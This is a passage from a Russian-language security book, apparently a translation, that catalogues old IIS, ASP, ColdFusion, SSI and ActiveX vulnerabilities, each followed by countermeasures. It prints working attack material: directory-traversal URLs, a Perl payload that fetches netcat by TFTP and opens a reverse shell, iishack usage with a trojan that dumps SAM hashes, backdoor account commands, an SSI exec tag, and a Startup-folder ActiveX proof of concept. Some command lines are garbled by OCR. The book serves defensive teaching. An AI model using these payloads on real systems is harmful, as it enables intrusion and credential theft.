    Один из членов группы LOpht в 1997 году обнаружил ошибку, которая возникает, если одну или несколько точек поставить после адреса URL страницы ASP сервера IIS 3.0. При этом можно просмотреть исходный код ASP и проанализировать логику этой программы. Еще важнее то, что в данном файле можно найти такую важную информацию, как имена и пароли пользователей. Чтобы воспользоваться этой возможностью, нужно просто добавить точку после URL.

    Контрмеры



    Хорошая новость заключается в том, что компания Microsoft выпустила модуль обновления для сервера IIS 3.0. 
    Однако имеется и плохая новость: выпушенный модуль обновления породил другой изъян. Замена в имени файла example, asp точки на ее шестнадцатеричное представление (0х2е) по-прежнему позволяет взломщику загрузить на свой компьютер файл с исходным кодом ASP. 

    Уязвимость ASP, связанная с альтернативными потоками данных



    Впервые об этом изъяне в бюллетене Bugtraq сообщил Пауль Эштон (Paul Ashton). В данном случае также можно загрузить исходный код страниц ASP. Этой возможностью легко воспользоваться, поэтому она стала довольно популярна среди новичков. Просто задайте URL в следующем формате.
    http://192.168.51.101/scripts/file.asp::$DATA
    Если метод сработал, броузер Netscape попросит указать место, в котором нужно сохранить файл. Броузер Internet Explorer по умолчанию покажет исходный файл в диалоговом окне. После этого его можно сохранить и просматривать в любом текстовом редакторе. 

    Контрмеры



    Для усиления защиты ограничьте доступ ко всем исходным файлам, отменив право на чтение для группы Everyone. В конце концов, для исходного код вполне достаточно разрешения на выполнение.

    Изъяны showcode. asp и codebrws. asp



    Рассмотрим еще один изъян, имеющий отношение к IIS 4.0, который связан с возможностью просмотра исходного кода ASP. Его отличие от рассмотренных выше ошибок заключается в том. что сам по себе этот изъян не является ошибкой, а представляет собой пример плохого программирования. Если в процессе установки сервера IIS 4.0 будут скопированы также файлы с примерами исходного кода ASP, то несколько плохо написанных файлов позволят взломщику загрузить на свой компьютер другие файлы. Проблема заключается в неспособности сценариев обрабатывать символы .., содержащиеся в пути к файлу. В следующем примере использование файла showcode.asp приведет к отображению файла boot.ini взламываемой системы (если доступ ограничен незначительно, то просмотреть можно любой файл).

    http: //192.168. 51.101/msadc/Samples/
    SELECTOR/showcode. asp?source=/../../../../../boot.ini

    Точно так же, посредством файла codebrws.asp можно просмотреть любой файл, который находится на локальном диске. Как упоминалось в главе 13, можно попытаться найти файлы с расширением GIF программы pcAnywhere.

    http://192.168.51.101/iissamples/exair/howitworks/
    codebrws.asp?source=/../../../../../winnt/repair/setup.log

    Изъяны showcode.asp и codebrws.asp невозможно использовать для корректной загрузки с целевого узла двоичных файлов. Причина заключается в том, что сценарий ASP обычно преобразовывает файлы. Преобразование такого файла, как SAM._, приведет к его повреждению и сделает его непригодным для использования. Однако это не помешает умелому хакеру восстановить структуру файла SAM и воспользоваться полученной информацией.

    Контрмеры против использования изъянов в файлах АSР



    Рассмотренные выше проблемы можно решить, установив модуль обновления сервера IIS. Этот модуль, а также статью Q232449 из базы знаний компании Microsoft, можно найти по адресу ftp://ftp.microsoft.com/ bussys/IIS/iis-public/ fixes/usa/Viewcode-fix/.

    Изъян webhits.dll



    Ряд проблем, связанных с возможностью просмотра файлов, был выявлен группой CIS (Cerberus Information Security). Эти изъяны связаны с приложением ISAPI webhits.dll. Эта динамически подключаемая библиотека реализует механизм выделения информации в процессе функционирования MS Index Server. Однако ее наличие делает возможным взлом, при котором злоумышленник просматривает важные исходные коды ASP или другую информацию, содержащуюся на локальном диске. Первая из возможных атак начинается с использования существующего файла . HTW для просмотра исходного кода.
    Вторая атака связана с передачей системе имени несуществующего файла. В качестве основы используется существующий файл и символы пробела (%20), число которых превышает 230, и которые расположены между именем реального файла (default.asp) и расширением . HTW. При этом информационные службы Internet игнорируют расширение (.HTW) и предоставляют в распоряжение взломщика любой файл системы:

    http://192.168.51.101/default.asp%20%20%20%20%20%20%20%
    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2
    0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
    20%20%20%20%20%20%20%20%20%20%20%2С%20%20%20 %20%20%20%
    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
    20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
    20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%
    20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%
    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
    20%20%20%20%2С%20%20%20%20%20%20%20%20%20%20%20%20%20%
    20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%
    20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%
    20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%
    20%20%20%20%20%20
    .htw?CiWebHitsFile=/../../../../../test.
    txt&CiR estriction=none&CiHiliteType=Full

    Третья .HTW-атака основана на использовании имени файла null.htw для помещения в окно броузера необработанного файла:

    http://192.168.51.10I/null.htw?CiWebHitsFile=/../../../../../winnt/
    repair/setup.log&CiRestriction=none&CiHiliteType=Full

    Использование предыдущего адреса URL приведет к тому, что сервер IIS предоставит файл /winnt/repair/setup.log.

    Контрмеры против использования изъянов библиотеки webhits.dll

    Для предотвращения использования рассмотренных атак удалите приложения, связанные с файлами с расширением . HTW. Для этого откройте диалоговое окно с основными свойствами уязвимого сервера, а затем для службы WWW Service щелкните на кнопке Edit. Далее перейдите во вкладку Home Directory и щелкните на кнопке Configuration из группы Application Settings. При этом на экране появится следующее диалоговое окно.


    Затем выделите строку, в которой указано приложение, связанное с файлами . HTW, и щелкните на кнопке Remove. После этого Web-сервер больше не будет обращаться к библиотеке webhits .dll, и, таким образом, этот изъян будет устранен.


    Изъяны сервера ColdFusion



    Специалистами группы LOpht было обнаружено несколько существенных изъянов в сервере приложений Cold Fusion, позволяющих осуществлять удаленный запуск команд на уязвимом Web-сервере. В процессе установки этого программного продукта вместе с ним копируются также примеры кода и интерактивная документация. Причиной обнаруженных изъянов послужили несколько примеров, взаимодействие которых не ограничивается только локальным узлом.
    Первая из проблем связана с устанавливаемым по умолчанию файлом opnfile.cfm. Этот файл позволяет взломщику загрузить на Web-сервер любой файл. Другой файл, displayopenedfile.cfm, помещает этот файл в окно броузера. Кроме того, exprcalc.cfm анализирует загруженный файл и удаляет его (во всяком случае, он для этого предназначен). Используя только файл openfile.cfm, можно ввести систему в заблуждение, чтобы она не удаляла загруженный файл, а затем выполнить локально любую команду. Чтобы воспользоваться этой возможностью, выполните следующие действия.
    1. Создайте файл, который при загрузке на удаленный Web-сервер приведет к выполнению локальной команды. Например, можно воспользоваться следующим сценарием Perl с именем test.pl.

    systemC'tftp -i 192.168.51.100 GET nc.exe");
    system("nc-e cmd.exe 192.168.51.100 3000");

    Этот метод сработает в том случае, если на сервере Cold Fusion установлен интерпретатор языка Perl.
    2. Задайте в броузере следующий адрес URL.

    http://192.168.51.101/cfdocs/expeval/openfile.cfm

    3. Укажите в поле Open File путь к созданному файлу и щелкните на кнопке ОК. 4. В адресе URL замените строку D:\INETPUB\WWWROOT\cfdocs\expeval\test.pl на полное имя файла exprcalc.cfm (с указанием пути), предназначенного для удаления загруженных в систему файлов. После внесения изменений URL должен выглядеть следующим образом.

    http://192.168.51.101/cfdoce/expeval/ExprCalc.cfra?RequestTimeout=
    2000&OpenFilePath-D:\lNETPOB\WWWROOT\cfdocs\expeval\exprcalc.cfm

    5. В окне должно появиться содержимое файла exprcalc. cfm и он должен быть удален из системы. После этого все файлы, загруженные с помощью openfile.cfm, будут оставаться в удаленной системе.
    6. Проделав еще раз описанные действия, загрузите повторно файл test.pl на удаленную систему. После этого данный файл (test.pl) будет ожидать вызова.
    7. С помощью следующего URL запустите файл test.pl. http://192.168.51.101/cfdocs/expeval/test.pl
    8. Если перед этим были запущены сервер TFTP и утилита netcat, то должно появиться следующее приглашение (т.е. командная строка, позволяющая выполнять команды с правами администратора). 

    С:\>пс -1 -р 3000
    Microsoft(R) Windows NT(TM)
    (С) Copyright 1985-1996 Microsoft Corp.
    D:\INETPUB\WWWROOT\cfdocs>

    Контрмеры против использования изъянов сервера Cold Fusion



    Для того чтобы предотвратить возможность использования изъянов Cold Fusion, можно воспользоваться двумя способами:



    8.gif

    Изображение: 

    9.gif

    Изображение: 

    7. Переполнение буфера



    Переполнение буфера


    Многие годы проблемы, связанные с переполнением буфера, были серьезным недостатком системы защиты системы UNIX. После появления в 1995 году статьи How to write buffer overflow  в мире UNIX многое переменилось. В классической статье Алефа Вана (Aleph One) Smashing the stack for fun and profit, впервые опубликованной в журнале Phrack Magazine в 1996 году, подробно описано, насколько просто добиться переполнения буфера. 
    Для тех, кто незнаком с этой концепцией постараемся ее четко сформулировать. Переполнение буфера позволяет взломщику поместить в переменную значение, которое больше, чем максимально допустимое. После этого он сможет выполнить произвольный код с привилегиями текущего пользователя, обычно root. В большинстве случаев проблема заключается в плохо написанном коде. Примером такого кода может быть программа, помещающая данные в буфер и не проверяющая их размер. Наиболее популярная команда, которую можно удаленно выполнить в системе Solaris, выглядит примерно следующим образом: /usr/openwin/bin/xterm -display <your_IP_address>: 0 . 0 &.
    Рассматриваемые ниже изъяны позволят получить полное представление о методах, которые взломщики используют для удаленного переполнения буфера. Имея такую информацию, вы сможете улучшить качество и надежность своих программ.

    Изъян РНР



    В сценариях РНР имеется два (а возможно и больше) изъянов. Один из них является обычной проблемой отсутствия проверки ввода, ставшей бедствием для многих разрабатываемых ранее сценариев. С использованием этого изъяна взломщики могли просмотреть любой файл целевой системы. 

    Контрмеры против использования изъяновРНР



    Обеспечить защиту можно двумя способами:

    •  Удалите уязвимые сценарии.
    •  Обновите сценарии РНР до самой последней версии.

    Изъян wwwcount.cgi



    Программа wwwcount является популярным счетчиком Web. Впервые о ее изъяне и его применении стало известно в 1997 году. Этот изъян позволяет взломщик)' удаленно выполнять любой код на локальной системе. Широкой общественности по крайней мере стало известны два примера использования этого изъяна, однако в обоих случаях происходило в основном одно и то же: "захват" взломщиком окна xterm.

    Контрмеры против использования nsbflHawwwcount



    Предотвратить использование изъяна программы wwwcount можно двумя способами: 

    •  Удалите сценарий wwwcount. cgi.
    •  Отмените для сценария право на выполнение с помощью команды chmod -x wwwcount.cgi.

    Изъян iishack сервера IIS 4.0



    В июне 1999 года широкой общественности стало известно о досадной ошибке в системе защиты сервера IIS 4.0, которая оказалась серьезной угрозой безопасности Web-сервера компании Microsoft. Этот изъян был обнаружен группой экспертов по вопросам безопасности еЕуе, которая поместила в Internet исходный код и исполняемый файл, с помощью которого можно осуществить взлом. Источником проблемы является недостаточная проверка границ имен файлов .НТК, .STM и .юс, содержащихся в адресах URL. Это позволяет взломщику поместить в этот адрес код, который будет загружен на целевую систему и выполнен с правами администратора.
    Программа, демонстрирующая использование данного изъяна, называется iishack, а найти ее можно по адресу http://www.technotronic.com (а также И на других Web-узлах). При этом достаточно указать адрес URL и имя файла типа "троянский конь", который нужно запустить:

    C:\nt\>iishack 10.12.24.2 80 172.29.11.101/getem.exe
    ---(US 4.0 remote buffer overflow exploit)— — —
    (c) dark spyrit — barns@eeye.com. http://www.eEye.com
    [usage: iishack <host> <port> <url>]
    eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
    do not include 'http://1 before hosts!
    Data sent!

    Созданная авторами простая программа типа "троянский конь" getem.exe, распаковывает утилиту pwdump.exe (позволяющую получить дамп хеш-кодов базы данных SAM), запускает утилиту netcat, настроенную на прослушивание порта 25, и возвращает обратно командную оболочку (nc -nw -L -р 25 -t -e cmd.exe). После успешного выполнения всех этих действий на собственном компьютере можно запустить утилиту netcat, получив таким образом в свое распоряжение командную оболочку и локальный доступ с привилегиями учетной записи SYSTEM (т.е. с правами администратора):

    C:\>nc -nw 10.11.1.1 26
    (UNKNOWN) [10.11.1.1] 26 (?) open Microsoft(R)
    Windows NT (TM) (C) Copyright 1985-1996 Microsoft Corp.
    С:>pwdump
    administrator:500:03096B7CD9133319790F5B37EAB66"E30:
    5ACA8A3A546DD587A 58A251205881082:
    Built-in account for administering the computer/doma in:
    Guest:501:NO PASSWORD
    **************;NO PASSWORD**************
    *******:Built-in account for guest access to the computer/domain::
    sqldude:1000:853FD8DOFA7ECFOFAAD3B435B
    51404EE:EE319BA58C3E9BCB45AB13 CD7651FE14:::
    SQLExecutiveCmdExec:1001:01FC5A6BE7BC6929AAD3B435B51404EE:
    OCB6948805 F797BF2A82807973B89537:SQLExecutiveCmdExec,
    SQL Executive CmdExec Task Account:C_:

    С помощью простых команд копирования и вставки, применяемых в командной строке, а также программы LOphtCrack, которая используется для взлома хеш-кодов, можно получить в свое распоряжение пароль администратора (и любого другого пользователя системы).
    Более простая (но менее скрытая) атака заключается в создании нового пользователя с помощью команды net localgroup password haxor /add, а затем добавление этого пользователя (в данном случае haxor) в группу администраторов с помощью команды net localgroup Administrators haxor /add. Если порт NetBIOS сервера (TCP 139) открыт для взломщика, то он может к нему подключиться и делать все что угодно. Конечно же, поскольку взломщик выполняет в системе значительные изменения, то их можно выявить с использованием простых средств аудита системы.

    Контрмеры против изъянов US 4.0



    Сначала компания Microsoft разработала комплекс рекомендаций для устранения этой проблемы, а затем выпустила модуль обновления. Группа экспертов eEye выпустила свой собственный модуль обновления, однако всегда рекомендуется использовать средства от производителя.

    Изъян переполнения полей



    У читателя может возникнуть вопрос, "Действительно ли можно взломать Web-сервер, пользуясь только Web-броузером?" На этот вопрос можно ответить вполне определенно: "ДА". Программисты в Web в первую очередь заботятся о производительности, отодвигая вопросы безопасности на второй план. Лучше всего это видно на примере ошибки, возникающей при переполнении буфера на сервере Cold Fusion, которая была обнаружена группой Foundstone. Проблема заключается в том, каким образом компания Allaire реализовала проверку достоверности входных данных, которые вводятся в поле пароля администратора. Пользуясь недостаточно полной очисткой этого поля, взломщик с помощью одного броузера может практически полностью вывести Web-сервер из строя. Вот как это можно сделать.

    1. Введите в броузере адрес страницы регистрации администратора в системе на типичном сервере Cold Fusion:
    2. С помощью соответствующей команды (в броузере Netscape — это File =*Edit Page) перейдите в режим редактирования кода HTML.
    3. Дважды щелкните на дескрипторе ACTION (верхний левый) и измените его, вставив имя/адрес URL сервера:

    <form
    Action="http://192.168.51.101/CFIDE/administrator/index.cfm"
    Method="POST">

    4. Измените дескриптор HTML с именем PasswordProvided, который содержит пароль, а затем измените свойства size и MAXLENGTH:

    <input Name="PasswordProvided"
    Type="PASSWORD"
    Size="1000000" MAXLENGTH="10ООООО">

    5. Щелкните на кнопке Preview, расположенной на панели инструментов Netscape, и сохраните этот файл в формате HTML.
    6. Поле ввода пароля теперь должно расшириться вправо и выйти за границы экрана. Сгенерируйте около 1,000,000 символов и скопируйте их в это поле.
    7. Щелкните на кнопке Password. Если все прошло хорошо (или плохо, если вы являетесь системным администратором), то можно будет увидеть следующее:


    На приведенном рисунке можно увидеть, что выполненные выше действия привели к подъему использования процессора сервера до 100%. Если подобные запросы продолжают поступать то, в конце концов, произойдет переполнение памяти. Более того, если на сервер отправить больше миллиарда символов, это окончательно выведет его из строя. В любом случае, для выяснения причины сбоя придется перезагружать систему.

    Контрмеры



    Единственным эффективным решением проблемы подобного рода является использование в каждой разрабатываемой программе процедуры очистки входных данных. В рассмотренном случае можно переместить страницу администратора в какой-то другой каталог или выполнить рекомендации по обеспечению безопасности сервера Cold Fusion, которые можно найти по адресу http://www.allaire.com/Handlers/index. cfm?ID=10954&Method=Full.


    15.gif

    Изображение: 

    8. Плохое проектирование в Web



    Плохое проектирование в Web


    Хотя в истории развития Internet имеются многочисленные примеры разрушительных атак на Web-серверы, которые позволяют взломщикам получать важную информацию об устройстве сервера, а зачастую и привилегированные права доступа, эти взломы — только вершина айсберга. Многие разработчики не стремятся изучить жизненно важные методы проектирования, которые могли бы ограничить нежелательное использование их Web-серверов. В развитие многих из методов, обсуждаемых в этой главе, внесли вклад многие люди, в том числе Симпл Номад (Simple Nomad) из центра NMRCи компания Perfecto Inc.

    Использование скрытых дескрипторов



    В настоящее время многие компании пользуются Internet, предлагая свои продукты и услуги любому, у кого есть Web-броузер. Но "плохо запрограммированная" тележка для покупок может позволить взломщику фальсифицировать стоимость товаров. Например, рассмотрим небольшую компанию, занимающуюся продажей аппаратного обеспечения. Эта компания обзавелась собственным Web-сервером, чтобы ее клиенты могли осуществлять покупки в интерактивном режиме. Однако они допустили в программе важный промах: применили скрытые дескрипторы HTML как единственный механизм назначения цены за определенный товар. В результате, если взломщики обнаружат это уязвимое место, они смогут изменить цену, стоящую в скрытых дескрипторах, по своему усмотрению.
    Например, пусть на Web-узле имеется страница продаж со следующим кодом HTML.

    <FORM ACTION="http://192.168.51.101/cgi-bin/order.pi"
    method="post">
    <input type=hidden name="price"
    value="199.99">
    <input type=hidden name="prd_id"
    value="X190">
    QUANTITY: <input type=text name="
    quant" size=3 maxlength=3 value=l>
    </FORM>

    В этом случае простое изменение цены с помощью Netscape Composer или в любом текстовом редакторе позволит взломщику заплатить за товар $1.99 вместо предполагаемой суммы $199.99:
    <input type=hidden name="price" value="l.99">
    Если вам кажется, что такой стиль программирования встречается редко, то можете удостовериться в этом самостоятельно. Стоит лишь зайти на узел http://www.altavista.com и осуществить поиск, задав в качестве критерия строку type=hidden name=price. В результате будут получены адреса сотни узлов, обладающих таким изъяном.
    Другая форма взлома заключается в использовании значения ширины поля. При проектировании в Web указываются многие размеры, однако взломщик может менять заданные разработчиком значения, указывая размеры порядка 70,000 символов. Затем он может ввести в соответствующее поле строку, состоящую из большого числа символов, и это может привести к выходу сервера из строя. Если этого и не произойдет, то подобные действия все же могут привести к непредсказуемым последствиям.

    Контрмеры против использования скрытых дескрипторов



    Чтобы предотвратить возможность использования взломщиками скрытых дескрипторов HTML, ограничьте их использование в коде, который обеспечивает хранение такой важной информации как цены, или, по крайней мере, реализуйте режим подтверждения этих значений перед их использованием.

    Вставки SSI



    Механизм SSI (Server Side Includes) обеспечивает интерактивную работу в режиме реального времени без использования программирования. Разработчики Web-приложений часто используют эту возможность для быстрого получения системной даты/времени или для запуска локальной команды и обработки выходных данных. Возможности таких вставок реализуются с помощью дескрипторов (tag). В число дескрипторов входят: echo, include, fsize, flastmod, exec, config, odbc, email, if, goto, label, и break. Три из них, include, exec и email, могут оказаться наиболее полезны взломщикам.
    Вставив код SSI в поле документа HTML, обрабатываемое Web-сервером, взломщик может локально запускать команды и получать доступ к серверу. По такому принципу можно разработать ряд разновидностей взломов. Например, при вставке дескриптора SSI в первое или последнее поле имени, появляющееся при создании новой учетной записи, Web-сервер попытается обработать это выражение и запустить соответствующую команду. Следующий дескриптор SSI отображает на машине взломщика графический терминал сервера.

     <!--#ехес cmd="/usr/XHR6/bin/xterm -display attacker:0 &"-->

    Меры предосторожности против использования SSI



    Нужно пользоваться сценарием, проводящим предварительный синтаксический анализ любого прочитанного файла HTML, и отбрасывающим любую несанкционированную строку SSI перед передачей этого файла серверу для обработки.

    Добавления к файлам



    Любая возможность Web-приложений, позволяющая пользователю вводить информацию в файл непосредственно повышает уязвимость системы и создает потенциальную возможность атаки. Например, если на Web-узле содержится форма для ввода рекомендаций по улучшению работы узла, или что-то другое в том же духе, и пользователи имеют возможность просматривать этот файл, то взломщик может воспользоваться этим обстоятельством. Используя код SSI (описанным выше способом), он может поместить в файл с комментариями код, который запускается локально, или код JavaScript, предлагающий ввести входящим пользователям их имя и пароль, чтобы использовать эту информацию в будущем.

    Контрмеры против использования добавлений к файлам



    Нужно ограничить возможность использования добавлений в процессе совместного интерактивного использования информации, так как эти возможности открывают взломщику слишком много путей манипулирования пользователями и Web-сервером.


    9. Резюме



    Резюме


    В этой главе обсуждаются распространенные и не очень известные проблемы, обнаруженные в Internet. У взломщиков на вооружении имеется определенный набор способов, к которым они могут прибегнуть, пытаясь получить доступ к Web-серверу, или хотя бы обмануть его. При этом они могут пользоваться изъянами проверки входных данных, условиями переполнения буфера или обычными промахами, допущенными при разработке Web-приложений.
    В то время как большинство изъянов, связанных с проверкой входных данных и переполнением буфера, довольно просто ликвидировать, проблему, возникающую при некачественной разработке серверов, решить бывает намного труднее, особенно в случае "доморощенного" дизайна. Тем не менее, удаление ненужных примеров сценариев, очистка входных данных сценариев и улучшение дизайна Web-приложений, включающие более строгую проверку SSI, скрытых дескрипторов и добавлений в файлы со стороны пользователей, может в значительной мере усложнить работу взломщика.


    Глава 16. Атаки на пользователей Internet



    Глава 16. АТАКИ НА ПОЛЬЗОВАТЕЛЕЙ INTERNET




    1. Атаки на пользователей INTERNET



    Атаки на пользователей INTERNET


    До сих пор много говорилось об общепринятых методах взлома систем, принадлежащих различным компаниям и управляемых опытными администраторами. Ведь считается, что именно там находятся основные ценности, не так ли? Не может же зловредный хакер пытаться найти что-нибудь интересное на домашнем компьютере какой-нибудь старушки.
    Но на самом деле, такая ситуация представляет собой лишь небольшую часть общей картины. В наше время неуклонно растет число людей, которые пользуются программными продуктами, являющимися объектом охоты хакеров: Web-броузерами, программами обработки электронной почты и другими всевозможными программами-клиентами Internet. Таким образом, каждый пользователь такого программного обеспечения может стать жертвой, а информация о его системе представляет такую же, если не большую ценность, чем та, которая имеет отношение к персоналу Web-сервера. Проблема усугубляется еще тем обстоятельством, что данные о конечных пользователях распределены гораздо шире, чем сведения о сервере.
    С помощью описанных в этой главе инструментов и методов можно воздействовать не только на систему отдельного пользователя, но в значительной мере и на организацию, в которой он работает. Если принять во внимание, что каждый сотрудник фирмы, от главного администратора до простого служащего использует вышеупомянутое программное обеспечение на протяжении 90% своего рабочего времени (для чтения электронной почты и просмотра Web-страниц), то сразу станет очевидна вся серьезность проблемы как для корпоративного, так и для рядового пользователя Internet (кстати, и для той самой бабушки). Следует также учесть и то, какое негативное влияние на репутацию компании и на степень доверия к ней партнеров может оказать тот факт, что ее системы являются постоянным источником вирусов и других опасных программ, а компания не предпринимает соответствующих мер безопасности. Ну как, вы еще не задумались?
    Судя по количеству информационных бюллетеней, посвященных обеспечению безопасности клиентского программного обеспечения Internet, которые были выпущены в 2000 году, число бойцов невидимого фронта, взламывающих системы пользователей Internet, растет как снежный ком. В конце концов, подходы, используемые для взлома клиентской части, лишь немногим отличаются от тех, которые применяются для взлома таких крупных серверов Internet, как www.amazon.com. Различие состоит лишь в степени затрачиваемых усилий и в масштабе всего мероприятия. Вместо того чтобы концентрировать усилия на одной мишени или определенном приложении Web-сервера, при взломе пользовательских систем хакер должен привести к общему знаменателю широкий спектр потенциальных жертв. Обычно в качестве таких критериев выбирается частое использование Internet, чрезвычайно популярные и широко используемые программные продукты компании Microsoft, а также недостаточное осознание проблем безопасности простыми смертными, которые работают с этим программным обеспечением.
    В книге уже было описано немало атак, которые основываются на этих обстоятельствах. В главе 4 обсуждались взломы компьютеров, на которых установлены операционные системы компании Microsoft (Win 9x/ME), а среди обитателей Internet они составляют безоговорочное большинство. В главах 4 и 14 речь шла о программах типа "троянский конь" и средствах создания "потайных ходов", часто внедряемых в системы ничего не подозревающих пользователей, а также о социальной инженерии, эффективно применяемой хакерами для вовлечения операторов ЭВМ в свои злонамеренные замыслы. Методы, которые представлены в этой главе, также основываются на некоторых из вышеупомянутых принципов. Вы познакомитесь с самыми разнообразными и коварными способами внедрения "потайных ходов", а также с эффективным использованием социальной инженерии, когда активно применяются различные технические средства.
    Прежде чем приступать к изложению основного материала, хотелось бы предупредить некоторых невыдержанных читателей о том, что все, о чем пойдет речь, требует умелого обращения. Без сомнения, найдутся читатели, которые будут критиковать книгу за подробное объяснение многих типов взломов. На это можно ответить следующим образом: только доскональное знание тактики противника может обезопасить потенциальных жертв. Знакомство с представленным материалом позволит многим пользователям открыть глаза на реальное положение дел. Читайте и набирайтесь знаний, позволяющих защитить свой уголок Internet.


    2. Мобильный код со злым умыслом



    Мобильный код со злым умыслом


    Появление мобильного кода стало важным событием в процессе развития Internet от статического набора документов до случайным образом генерируемой среды, которой она стала на сегодняшний день. Развитие современных технологий, основанных на динамических данных, может стать основной моделью обработки информации в будущем. Однако сейчас акцент делается не на повышении надежности клиентских вычислительных моделей, а на расширении использования динамических документов HTML (DHTML), таблиц стилей и повышении производительности сценариев серверных приложений. (Правда, на это можно возразить, что сама обработка данных происходит все же на клиентском компьютере, однако подобный спор требует углубления в архитектуру самого Web-броузера.) В любом случае мобильный код, передающийся по сети на узел назначения, на сегодняшний день остается важнейшей частью фундамента Internet. Механизмы поддержки двух доминирующих парадигм мобильного кода, язык Java компании Sun и элементы управления ActiveX компании Microsoft, встроены во все броузеры. Поэтому их изучение является крайне важным для обеспечения безопасности любого клиента Internet.
    ActiveX и Java часто сравниваются между собой, однако авторам не хотелось бы вдаваться в подобные дебаты на страницах этой книги. Лучше просто обсудить реальные изъяны, обнаруженные в каждом из этих подходов. Тем, кто интересуется подробным техническим описанием преимуществ и недостатков обоих моделей разработки мобильного кода с точки зрения их безопасности, можно порекомендовать статью Девида Хопвуда (David Hopwood) A Comparison Between Java and ActiveX Security.


    3. Элементы ActiveX компании Microsoft



    Элементы ActiveX компании Microsoft


    Элементы управления ActiveX являются результатом повторной попытки фирмы Microsoft разработать модель мобильного кода. Их часто описывают как приспособленную для Web технологию создания документов со связыванием и внедрением объектов (Object Linking and Embedding — OLE). На самом деле это сильно упрощенная трактовка набора интерфейсов, спецификаций и претендующих на исключительность парадигм разработки, входящих в модель СОМ компании Microsoft (COM — Component Object Model), которая и составляет основу технологии ActiveX. В то же время подобные упрощения способствуют лучшему пониманию. Приложения ActiveX могут создаваться для выполнения определенных задач (таких как воспроизведение видео-или звукового файла). Их можно поместить на Web-страницу, и тогда эти программы будут выполнять свои функции при ее просмотре точно так же, как технология OLE поддерживает операцию вставки электронных таблиц Excel в документы Word.
    Обычно файлы с элементами управления ActiveX имеют расширение .OCX (исключением являются элементы управления ActiveX, написанные на Java). Они вставляются в Web-страницы с помощью дескриптора OBJECT, в котором указано, откуда элемент управления нужно загрузить. Когда броузер Internet Explorer обрабатывает Web-страницу с внедренным в нее элементом управления ActiveX (или несколькими элементами управления), первым делом он обращается к локальному системному реестру. Там он пытается определить, имеется ли на компьютере требуемый компонент. Если это так, Internet Explorer отображает Web-страницу, загружает элемент управления в свое адресное пространство и выполняет его код. Если необходимый элемент управления не найден, Internet Explorer загружает его из того места, которое указано в дескрипторе <OBJECT>, и устанавливает на компьютере пользователя. Кроме того, с помощью сертификатов Authenticode (см. ниже) броузер выполняет верификацию автора кода, а затем запускает его. По умолчанию элементы управления кэшируются в каталоге \windows\occache.
    Не выходя за рамки вышеописанной модели, хакер-программист может создать элементы управления ActiveX, которые будут выполнять на компьютере пользователя практически все, что захочется их автору. Что же может помочь в такой ситуации? Сертификаты Authenticode компании Microsoft. Эта подсистема позволяет разработчикам использовать механизмы шифрования и создавать для своего кода криптографические подписи, которые перед запуском элемента ActiveX будут аутентифицироваться броузером Internet Explorer и приложениями сторонних производителей (одним из таких производителей является компания Verisign Corporation).
    Как же на самом деле используются сертификаты Authenticode? В 1996 году программист по имени Фред Маклейн (Fred McLain) написал элемент управления ActiveX, который корректно выключал пользовательский компьютер, если он работал под управлением операционной системы Windows 95 с улучшенным управлением электропитанием. Для этого кода, названного автором Internet Exploder (взрывная машинка Internet), компания Verisign выдана ему подлинный сертификат, после чего Маклейн разместил программу на собственном Web-узле. В результате недолгих дебатов о целесообразности такой публичной демонстрации модели безопасности Authenticode, компании Microsoft и Verisign лишили Маклейна сертификата, обвиняя его в нарушении обязательств, на которых основан этот документ. Элемент Exploder работает как и раньше, но при этом он информирует любителей попутешествовать в Internet о том, что код не зарегистрирован, и дает им возможность отказаться от его загрузки.
    Автор предоставляет читателю возможность решить самому, можно ли в этом случае считать, что сертификаты Authenticode выполняют свои функции, или нет. Но не стоит забывать о том, что Маклейн мог бы написать код, выполняющий намного более опасные действия, чем простое выключение компьютера. К тому же он мог проделать все это абсолютно скрытно. На сегодняшний день элементы ActiveX по-прежнему являются важным механизмом, который обеспечивает успешное функционирование многих Web-узлов. Однако при этом нередко возникают дополнительные проблемы, наиболее серьезные из которых обсуждаются в следующих разделах.

    Флаг "Safe for scripting" технологии ActiveX



    Летом 1999 года Георгий Гунински (Georgi Guninski) и Ричард М. Смит (Richard М. Smith) (и не только они) независимо обнаружили два различных изъяна в методе обработки элементов ActiveX броузером Internet Explorer. Установив для элементов управления флаг "safe for scripting" ("помеченный как безопасный"), их разработчики могут полностью обойти обычную процедуру проверки сертификатов Authenticode. В качестве примеров таких элементов ActiveX можно привести Scriptlet. typelib и Eyedog.OCX, предназначенные для использования в IE4 и более ранних версиях. Если для этих элементов управления установлен флаг "safe for scripting", то при их запуске в броузере на экран не будет выводиться никаких сообщений.
    Возможно, не стоит волноваться по поводу элементов управления ActiveX, выполняющих безобидные функции, однако и Scriptlet, и Eyedog имеют доступ к файловой системе пользователя. Элемент Scriptlet. typelib позволяет создавать, редактировать и перезаписывать файлы, хранящиеся на локальном диске, a Eyedog — обращаться к системному реестру и осуществлять сбор информации о технических параметрах компьютера.
    Георгий Гунински написал проверочный код для элемента управления Scriptlet, который помещает в каталог Startup удаленного компьютера исполняемый текстовый файл с расширением .НТА (приложение HTML — HTML Application). При следующей перезагрузке системы этот файл выполняется, и на экране отображается безобидное сообщение от Георгия.  Ниже приведен код, реализующий данную идею.

    <object id="scr"
    classid="clsid:06290BD5-48AA-HD2-8432-006008C3FBFC" >
    </object> <SCRIPT> scr.Reset ();
    scr.Path="C:\\windows\\Start
    Menu\\Programs\\StartUp\\guninski.hta";
    scr.Doc="<object id='wsh'
    classid='clsid:F935DC22-1CFO-11DO-ADB9-OOC04FD58AOB'X/
    object><SCRIPT>alert('Written by Georgi Guninski
    wsh.Run('с:\\command.com')
    ;</"+"SCRIPT>";
    scr.write(); </SCRIPT>
    </object>

